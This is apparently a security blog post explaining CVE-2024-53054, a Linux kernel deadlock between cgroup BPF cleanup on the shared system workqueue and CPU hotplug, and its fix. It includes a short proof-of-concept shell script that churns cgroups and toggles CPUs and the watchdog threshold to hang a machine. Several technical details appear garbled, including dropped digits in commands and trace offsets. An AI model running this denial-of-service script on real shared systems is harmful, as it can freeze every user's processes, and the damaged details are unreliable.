Summary:
A high-impact issue in the Linux kernel, tracked as CVE-2024-53054, was found in the way the kernel handled cgroup BPF (Berkeley Packet Filter) resource cleanup. Triggered by a race between resource deletion and CPU hotplug events, this vulnerability could lead to a system deadlock, meaning multiple kernel threads get permanently stuck and the machine becomes unresponsive. Here, we explain what caused it, how it can be reproduced, and how it was fixed.

What is the Problem?

When many cpuset cgroups are deleted, the kernel frees up their BPF resources _asynchronously_ by scheduling cleanup work in the global system_wq workqueue. If this global queue is overwhelmed (filled with hundreds of cleanup tasks), it blocks other critical maintenance jobs, eventually creating a deadlock where key locks (like cgroup_mutex and cpu_hotplug_lock) are never released.

Symptom:

A system log showing kworker threads blocked for many seconds, similar to

INFO: task kworker/::8 blocked for more than 327 seconds.
Workqueue: events cgroup_bpf_release
Call Trace:
 __schedule+x5a2/x205
 ...
 cgroup_bpf_release+xcf/x4d
 ...
 mutex_lock(&cgroup_mutex);
 ..blocking...

CPU and Watchdog Events:

- The system (or user) triggers frequent CPU on/offline actions (hotplug).

Lock Contention:

- CPU hotplug operations (like taking CPUs offline) require exclusive access to cpu_hotplug_lock (write lock).
- BPF cleanup and cgroup deletion use cgroup_mutex and also need to take cpu_hotplug_lock (read lock).
- These locks are held/acquired in different orders by different tasks, so if all workers are busy with one type, no progress can be made — a classic deadlock.

System Death:

- No more work can complete, so system maintenance, user tasks, and kernel resource cleanup all freeze.

Visualization

system_wq: [cgroup_bpf_release x 256 active] -> [more in inactive queue]
    |
    +-> Watchdog work (waiting)
    |
    +-> CPU hotplug (waiting for lock)
    |
    +-> cgroup_destroy_wq (waiting for lock)

Proof-of-Concept: How To Trigger It

If you’re running a vulnerable kernel and want to see the issue (NOT recommended on production machines!):

# Create and delete thousands of cpuset cgroups
for i in {1..250}; do
  mkdir /sys/fs/cgroup/cpuset/test$i
done
for i in {1..250}; do
  rmdir /sys/fs/cgroup/cpuset/test$i
done

# Hotplug CPUs on and off in a loop (as root)
while true; do
  echo  > /sys/devices/system/cpu/cpu1/online
  echo 1 > /sys/devices/system/cpu/cpu1/online
done &

# Randomly change watchdog threshold to force reconfiguration
while true; do
  echo $((RANDOM % 50 + 10)) > /proc/sys/kernel/watchdog_thresh
done &

Result:
After a few cycles the kernel may hang, and dmesg will fill with blocked workqueue messages.

Exploit Potential

While this bug does not allow for _privilege escalation_ or code execution, it is a severe *denial-of-service* vector:

- Any local user with permission to create/delete cgroups can hang the system.
- In shared hosting, containers, or VMs using cgroup isolation, a malicious user could easily freeze all processes.

How Was It Fixed?

Solution:
Linux maintainers patched the kernel by moving the cgroup_bpf_release work to a dedicated workqueue (cgroup_bpf_destroy_wq). This means:

- BPF cleanup tasks no longer block the core system_wq, freeing up room for critical work (like hotplug and watchdog).

Relevant code change

// Old code: schedules on system_wq (shared by all sorts of jobs)
INIT_WORK(&work, cgroup_bpf_release);
queue_work(system_wq, &work);

// Fixed code: uses a dedicated workqueue
static struct workqueue_struct *cgroup_bpf_destroy_wq;
cgroup_bpf_destroy_wq = alloc_workqueue("cgroup_bpf_destroy", ..., ...);
INIT_WORK(&work, cgroup_bpf_release);
queue_work(cgroup_bpf_destroy_wq, &work);

Upstream Linux Kernel Commit (fix):

cgroup/bpf: use a dedicated workqueue for cgroup bpf destruction

Security advisory:

CVE-2024-53054 on NVD (when published)

LKML discussion thread:

https://lore.kernel.org/all/20240604185101.15167-1-kernel.patches@xxxxxxxxx/

What Should You Do?

- Patch Immediately: If you manage Linux systems, update to a kernel that contains this fix (look for stable versions *after June 2024*).
- Reduce cgroup churn: Avoid large-scale batch create/delete cgroup workloads on unpatched kernels.

Bottom Line

*CVE-2024-53054* is a great lesson in how heavy background cleanup work in the kernel can threaten reliability, especially when crucial locks are involved. If you run multi-user Linux environments or rely on high-availability, keep your systems patched and watch those workqueues!


*This post is exclusive and tries to simplify a complex kernel issue for all audiences. If you're a developer or sysadmin, feel free to dive into the commit and references above for a deeper technical understanding.*

Timeline

Published on: 11/19/2024 18:15:25 UTC
Last modified on: 11/22/2024 17:11:42 UTC